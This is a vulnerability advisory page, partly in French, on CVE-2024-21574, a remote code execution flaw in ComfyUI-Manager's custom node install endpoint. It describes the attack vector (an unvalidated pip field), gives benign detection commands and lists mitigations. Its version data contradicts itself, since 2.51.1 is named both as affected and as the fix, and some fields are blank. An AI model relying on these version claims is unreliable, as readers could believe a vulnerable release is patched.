Plateforme
python
Composant
comfyui-manager
Corrigé dans
2.51.1
CVE-2024-21574 describes a remote code execution (RCE) vulnerability in ComfyUI-Manager, a Python-based application. This vulnerability arises from insufficient validation of the 'pip' field within a POST request to the /customnode/install endpoint, which is used for installing custom nodes. Successful exploitation allows an attacker to trigger a pip install on a user-controlled package or URL, leading to arbitrary code execution on the server. Affected versions include 0.0.0 up to and including 2.51.1; upgrading to version 2.51.1 resolves the issue.
The impact of CVE-2024-21574 is severe. An attacker who successfully exploits this vulnerability can achieve complete control over the ComfyUI-Manager server. This includes the ability to execute arbitrary commands, install malware, steal sensitive data, and potentially pivot to other systems on the network. The vulnerability's reliance on the pip package installer makes it particularly dangerous, as attackers can leverage malicious packages from compromised repositories or even host their own. Given ComfyUI-Manager's use in AI workflows, this could lead to data poisoning or the execution of unauthorized AI models, further expanding the potential damage. The lack of input validation directly enables this RCE, making it a high-priority concern.
CVE-2024-21574 was publicly disclosed on December 12, 2024. The vulnerability's simplicity and the widespread use of pip make it a likely candidate for exploitation. While no public proof-of-concept (PoC) has been widely reported, the ease of crafting a malicious pip command suggests that one could emerge quickly. The EPSS score is likely to be assessed as medium to high, given the RCE nature and the relative ease of exploitation. It is not currently listed on the CISA KEV catalog.
Organizations and individuals utilizing ComfyUI-Manager for AI workflows, particularly those with exposed instances or those allowing custom node installations from untrusted sources, are at significant risk. Shared hosting environments where multiple users share the same ComfyUI-Manager instance are especially vulnerable, as an attacker could potentially compromise the entire environment through a single user's custom node installation.
• linux / server:
journalctl -u comfyui-manager -g 'pip install' | grep -i error• python / supply-chain:
import subprocess
result = subprocess.run(['pip', 'install', '--version'], capture_output=True, text=True)
print(result.stdout)• generic web:
curl -I http://<comfyui_manager_ip>/customnode/install | grep 'pip'disclosure
Statut de l'Exploit
EPSS
7.10% (percentile 91%)
CISA SSVC
Vecteur CVSS
The primary mitigation for CVE-2024-21574 is to immediately upgrade ComfyUI-Manager to version 2.51.1 or later. If upgrading is not immediately feasible due to compatibility concerns or breaking changes, consider implementing temporary workarounds. Restrict network access to the /customnode/install endpoint to trusted sources only. Implement a Web Application Firewall (WAF) with rules to block requests containing suspicious or malicious pip commands. Carefully review and validate any custom node installations before applying them. Monitor system logs for unusual pip activity or unexpected process executions. While a direct detection signature is difficult without deeper analysis of the pip install process, monitor for the execution of unusual Python scripts or the installation of unexpected packages.
Mettez à jour ComfyUI-Manager à la version 2.51.1 ou supérieure. Cette version corrige la vulnérabilité d'exécution remota de code en validant correctement le champ 'pip' dans la requête POST à l'endpoint /customnode/install. Pour mettre à jour, utilisez le gestionnaire de paquets Python (pip) ou suivez les instructions fournies par le développeur du plugin.
Analyses de vulnérabilités et alertes critiques directement dans votre boîte mail.
CVE-2024-21574 is a critical remote code execution vulnerability in ComfyUI-Manager versions 0.0.0 through 2.51.1. It allows attackers to execute arbitrary code by exploiting a missing input validation in the /customnode/install endpoint.
You are affected if you are running ComfyUI-Manager versions 0.0.0 to 2.51.1. Immediately upgrade to version 2.51.1 or later to mitigate the risk.
The recommended fix is to upgrade ComfyUI-Manager to version 2.51.1 or later. If upgrading is not immediately possible, restrict access to the /customnode/install endpoint and implement WAF rules.
While no widespread exploitation has been confirmed, the vulnerability's ease of exploitation suggests it is a likely target. Monitor your systems closely for suspicious activity.
Refer to the ComfyUI-Manager project's official repository and release notes for the latest information and security advisories.
Téléverse ton fichier de dépendances et découvre instantanément si cette CVE et d'autres te touchent.
Téléverse ton fichier requirements.txt et nous te dirons instantanément si tu es affecté.